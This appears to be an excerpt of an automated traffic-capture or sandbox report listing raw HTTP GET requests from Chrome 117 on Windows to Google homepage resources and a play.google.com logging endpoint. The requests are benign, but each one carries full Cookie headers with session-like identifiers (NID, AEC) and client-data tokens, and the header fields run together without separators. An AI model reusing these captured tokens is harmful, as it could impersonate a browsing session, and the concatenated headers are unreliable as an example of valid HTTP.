NID=517=6KcQD-DCOfwRwfuOQLqsCzAUJU8k-iB9YwwFvcmpYUrmT-aHqe4PSNibvvpIkBpozbJIJI-v9_gESduPkkQlck55ADmg5cE9fHUaLwta4beFwdGVUm5zcL1RSzLKJg-VgLu4GE6dK63vW0eMz5cLTFXR7tT0ATtzr7WhodeQZxheX1xtXdL_83w649qhq4-0ZM-Ufd-SBZ6X
Source: global traffic HTTP traffic detected: GET /xjs/_/ss/k=xjs.hd.3K9kqFG9IbE.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAAAUADsJAABGAAAbABAAAAAAAAIAgAEAAAAAACABAAAAAmABAAAAAAACABAJAACgCAAAAIBACBAAgAAKIAQoQAIEiiAUAgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACAACAIwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAAAEgAAAMgAEyAAEAAAAAAABkAAAAAAAAAAAAAAAAAAAAAAAAAACAACAAoAAAAAAAAAAAAAAAAAAAAAAC/d=0/br=1/rs=ACT90oEAN8vKHPrZc1uQQW97laV6I-0P2A/m=syjv,syo3?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=6KcQD-DCOfwRwfuOQLqsCzAUJU8k-iB9YwwFvcmpYUrmT-aHqe4PSNibvvpIkBpozbJIJI-v9_gESduPkkQlck55ADmg5cE9fHUaLwta4beFwdGVUm5zcL1RSzLKJg-VgLu4GE6dK63vW0eMz5cLTFXR7tT0ATtzr7WhodeQZxheX1xtXdL_83w649qhq4-0ZM-Ufd-SBZ6X
Source: global traffic HTTP traffic detected: GET /client_204?cs=1&opi=89978449 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=6KcQD-DCOfwRwfuOQLqsCzAUJU8k-iB9YwwFvcmpYUrmT-aHqe4PSNibvvpIkBpozbJIJI-v9_gESduPkkQlck55ADmg5cE9fHUaLwta4beFwdGVUm5zcL1RSzLKJg-VgLu4GE6dK63vW0eMz5cLTFXR7tT0ATtzr7WhodeQZxheX1xtXdL_83w649qhq4-0ZM-Ufd-SBZ6X
Source: global traffic HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/ck=xjs.hd.3K9kqFG9IbE.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAEAUoDsJAABGAQAbABAAAAAAAAIAgAEAAYIAACIBAAABAnABABAIAIACABEJAICgCcCjTIBACBAmgAAKIAQoQAIEiiAUIgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACACCAYwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAQAEggAANgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/ujg=1/rs=ACT90oFp4gBNGXk7N4F5TdcKKkHmQCd2hQ/m=sb_wiz,aa,abd,syu0,sytz,sytu,syfw,syty,sytk,sy10v,sy103,sytp,sy102,syup,sytv,sytx,sytt,syue,syti,syuf,syug,syu7,syub,sytq,syu5,syu8,syu9,syu2,syu3,sytl,sytm,syrv,syrk,syri,syrh,syto,sy101,syuo,syun,syum,async,sywj,ifl,pHXghd,sf,sys2,sys5,sy48m,sonic,TxCJfd,sy48q,qzxzOb,IsdWVc,sy48s,sy1fe,sy1bs,sy1bo,syrg,syre,syrf,syrd,syrc,sy47c,sy47f,sy2c0,sy17n,sy14e,sy14f,syrq,syr8,syfa,sybu,sybx,sybs,sybw,sybv,syco,spch,sysv,sysu,rtH1bd,sy1cx,sy18q,sy17f,syg8,sy1cw,sy14k,sy1cv,sy17g,syga,sy1cy,SMquOb,sy8f,sygh,syge,sygf,sygi,sygd,sygq,sygo,sygm,sygc,sycl,sycg,sycj,syaj,syab,syb5,syai,syah,syag,sya4,syb0,syap,sy9r,sy9q,sych,sybz,syc0,syc6,syan,syb8,syc5,syby,sybr,sybq,syae,syal,syc1,sybm,sybj,sybi,sybk,syad,syb6,sybd,sybb,sybf,sybc,sybe,sya8,syb3,sycq,syd5,sycr,syd6,sya6,syb2,sya9,syb4,sya5,syb1,syao,syaa,sycp,syce,syca,sycb,sy9u,sy9y,sy9v,sy9z,sy9w,sy9o,sy9l,sy9n,sya3,syc2,syg2,sygb,syg7,syg5,sy7y,sy7v,sy7x,syg4,syg9,syg3,syg1,syfy,syfx,sy81,uxMpU,syft,syd0,sycy,sycs,syd7,sycu,syct,sybg,sycw,sycn,sy8x,sy8w,sy8v,Mlhmy,QGR0gd,aurFic,sy96,fKUV3e,OTA3Ae,sy8g,OmgaI,EEDORb,PoEs9b,Pjplud,sy8r,sy8k,A1yn5d,YIZmRd,uY49fb,sy7s,sy7q,sy7r,sy7p,sy7o,byfTOb,lsjVmc,LEikZe,kWgXee,Ug7Xab,U0aPgd,ovKuLd,sgY6Zb,qafBPd,ebZ3mb,dowIGb,sy1d2,sy1cz,syzi,syt6,d5EhJe,sy1di,fCxEDd,sywo,sy1dh,sy1dg,sy1df,sy1db,sy1d6,sy1d8,sy1d7,sy1da,sy1am,sy1af,sy17w,sywn,syz4,syz3,T1HOxc,sy1d9,sy1d5,zx30Y,sy1dj,sy1dd,sy192,Wo3n8,syv0,loL8vb,syv4,syv3,syv2,ms4mZb,syq8,B2qlPe,syw2,NzU6V,sy117,sywi,zGLm3b,syxw,syxx,syxo,DhPYme,MpJwZc,UUJqVe,sy7l,sOXFj,sy7k,s39S4,oGtAuc,NTMZac,nAFL3,sy8d,sy8c,q0xTif,y05UD,sy14x,sy1ce,sy1c8,syz2,sy1c0,sy16f,syz1,syz0,syyz,syz5,sy1c7,sy167,sy1bw,sy16c,sy1c6,sy14s,sy1c1,sy1bx,sy16d,sy16e,sy1c9,sy14h,sy1c5,sy1c4,sy1c2,syno,sy1c3,sy1cb,sy1bq,sy1by,sy1bp,sy1bv,sy1br,sy17a,sy1bz,sy1bl,sy16h,sy16i,syz7,syz8,epYOx?xjs=s3 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=6KcQD-DCOfwRwfuOQLqsCzAUJU8k-iB9YwwFvcmpYUrmT-aHqe4PSNibvvpIkBpozbJIJI-v9_gESduPkkQlck55ADmg5cE9fHUaLwta4beFwdGVUm5zcL1RSzLKJg-VgLu4GE6dK63vW0eMz5cLTFXR7tT0ATtzr7WhodeQZxheX1xtXdL_83w649qhq4-0ZM-Ufd-SBZ6X
Source: global traffic HTTP traffic detected: GET /async/hpba?vet=10ahUKEwiHxL-h_OCIAxVy2AIHHQM3AsYQj-0KCBY..i&ei=64P1ZseiHfKwi-gPg-6IsAw&opi=89978449&yv=3&sp_imghp=false&sp_hpte=1&sp_hpep=1&stick=&cs=0&async=_basejs:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en.UzAaLIOvKPw.es5.O%2Fam%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s%2Fdg%3D0%2Fbr%3D1%2Frs%3DACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA,_basecss:%2Fxjs%2F_%2Fss%2Fk%3Dxjs.hd.3K9kqFG9IbE.L.B1.O%2Fam%3DJCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAAAUADsJAABGAAAbABAAAAAAAAIAgAEAAAAAACABAAAAAmABAAAAAAACABAJAACgCAAAAIBACBAAgAAKIAQoQAIEiiAUAgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACAACAIwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAAAEgAAAMgAEyAAEAAAAAAABkAAAAAAAAAAAAAAAAAAAAAAAAAACAACAAoAAAAAAAAAAAAAAAAAAAAAAC%2Fbr%3D1%2Frs%3DACT90oEAN8vKHPrZc1uQQW97laV6I-0P2A,_basecomb:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en.UzAaLIOvKPw.es5.O%2Fck%3Dxjs.hd.3K9kqFG9IbE.L.B1.O%2Fam%3DJCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAEAUoDsJAABGAQAbABAAAAAAAAIAgAEAAYIAACIBAAABAnABABAIAIACABEJAICgCcCjTIBACBAmgAAKIAQoQAIEiiAUIgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACACCAYwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAQAEggAANgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s%2Fd%3D1%2Fed%3D1%2Fdg%3D0%2Fbr%3D1%2Fujg%3D1%2Frs%3DACT90oFp4gBNGXk7N4F5TdcKKkHmQCd2hQ,_fmt:prog,_id:_64P1ZseiHfKwi-gPg-6IsAw_8 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=6KcQD-DCOfwRwfuOQLqsCzAUJU8k-iB9YwwFvcmpYUrmT-aHqe4PSNibvvpIkBpozbJIJI-v9_gESduPkkQlck55ADmg5cE9fHUaLwta4beFwdGVUm5zcL1RSzLKJg-VgLu4GE6dK63vW0eMz5cLTFXR7tT0ATtzr7WhodeQZxheX1xtXdL_83w649qhq4-0ZM-Ufd-SBZ6X
Source: global traffic HTTP traffic detected: GET /logos/2024/popcorn/rc4/preload-sprite.png HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=6KcQD-DCOfwRwfuOQLqsCzAUJU8k-iB9YwwFvcmpYUrmT-aHqe4PSNibvvpIkBpozbJIJI-v9_gESduPkkQlck55ADmg5cE9fHUaLwta4beFwdGVUm5zcL1RSzLKJg-VgLu4GE6dK63vW0eMz5cLTFXR7tT0ATtzr7WhodeQZxheX1xtXdL_83w649qhq4-0ZM-Ufd-SBZ6X
Source: global traffic HTTP traffic detected: GET /logos/2024/popcorn/rc4/preload-bg-sprite.jpg HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=6KcQD-DCOfwRwfuOQLqsCzAUJU8k-iB9YwwFvcmpYUrmT-aHqe4PSNibvvpIkBpozbJIJI-v9_gESduPkkQlck55ADmg5cE9fHUaLwta4beFwdGVUm5zcL1RSzLKJg-VgLu4GE6dK63vW0eMz5cLTFXR7tT0ATtzr7WhodeQZxheX1xtXdL_83w649qhq4-0ZM-Ufd-SBZ6X
Source: global traffic HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/m=sy1em,P10Owf,sy1de,sy1dc,syr0,gSZvdb,sy10q,sy10p,WlNQGd,syr5,syr2,syr1,syqz,DPreE,sy112,sy110,nabPbb,sy10k,sy10i,syjv,syo3,CnSW2d,kQvlef,sy111,fXO0xe?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=6KcQD-DCOfwRwfuOQLqsCzAUJU8k-iB9YwwFvcmpYUrmT-aHqe4PSNibvvpIkBpozbJIJI-v9_gESduPkkQlck55ADmg5cE9fHUaLwta4beFwdGVUm5zcL1RSzLKJg-VgLu4GE6dK63vW0eMz5cLTFXR7tT0ATtzr7WhodeQZxheX1xtXdL_83w649qhq4-0ZM-Ufd-SBZ6X
Source: global traffic HTTP traffic detected: GET /xjs/_/ss/k=xjs.hd.3K9kqFG9IbE.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAAAUADsJAABGAAAbABAAAAAAAAIAgAEAAAAAACABAAAAAmABAAAAAAACABAJAACgCAAAAIBACBAAgAAKIAQoQAIEiiAUAgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACAACAIwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAAAEgAAAMgAEyAAEAAAAAAABkAAAAAAAAAAAAAAAAAAAAAAAAAACAACAAoAAAAAAAAAAAAAAAAAAAAAAC/d=0/br=1/rs=ACT90oEAN8vKHPrZc1uQQW97laV6I-0P2A/m=syjv,syo3?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=6KcQD-DCOfwRwfuOQLqsCzAUJU8k-iB9YwwFvcmpYUrmT-aHqe4PSNibvvpIkBpozbJIJI-v9_gESduPkkQlck55ADmg5cE9fHUaLwta4beFwdGVUm5zcL1RSzLKJg-VgLu4GE6dK63vW0eMz5cLTFXR7tT0ATtzr7WhodeQZxheX1xtXdL_83w649qhq4-0ZM-Ufd-SBZ6X
Source: global traffic HTTP traffic detected: GET /async/hpba?vet=10ahUKEwiHxL-h_OCIAxVy2AIHHQM3AsYQj-0KCBY..i&ei=64P1ZseiHfKwi-gPg-6IsAw&opi=89978449&yv=3&sp_imghp=false&sp_hpte=1&sp_hpep=1&stick=&cs=0&async=_basejs:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en.UzAaLIOvKPw.es5.O%2Fam%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s%2Fdg%3D0%2Fbr%3D1%2Frs%3DACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA,_basecss:%2Fxjs%2F_%2Fss%2Fk%3Dxjs.hd.3K9kqFG9IbE.L.B1.O%2Fam%3DJCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAAAUADsJAABGAAAbABAAAAAAAAIAgAEAAAAAACABAAAAAmABAAAAAAACABAJAACgCAAAAIBACBAAgAAKIAQoQAIEiiAUAgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACAACAIwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAAAEgAAAMgAEyAAEAAAAAAABkAAAAAAAAAAAAAAAAAAAAAAAAAACAACAAoAAAAAAAAAAAAAAAAAAAAAAC%2Fbr%3D1%2Frs%3DACT90oEAN8vKHPrZc1uQQW97laV6I-0P2A,_basecomb:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en.UzAaLIOvKPw.es5.O%2Fck%3Dxjs.hd.3K9kqFG9IbE.L.B1.O%2Fam%3DJCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAEAUoDsJAABGAQAbABAAAAAAAAIAgAEAAYIAACIBAAABAnABABAIAIACABEJAICgCcCjTIBACBAmgAAKIAQoQAIEiiAUIgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACACCAYwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAQAEggAANgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s%2Fd%3D1%2Fed%3D1%2Fdg%3D0%2Fbr%3D1%2Fujg%3D1%2Frs%3DACT90oFp4gBNGXk7N4F5TdcKKkHmQCd2hQ,_fmt:prog,_id:_64P1ZseiHfKwi-gPg-6IsAw_8 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
Source: global traffic HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/m=aLUfP?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
Source: global traffic HTTP traffic detected: GET /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; 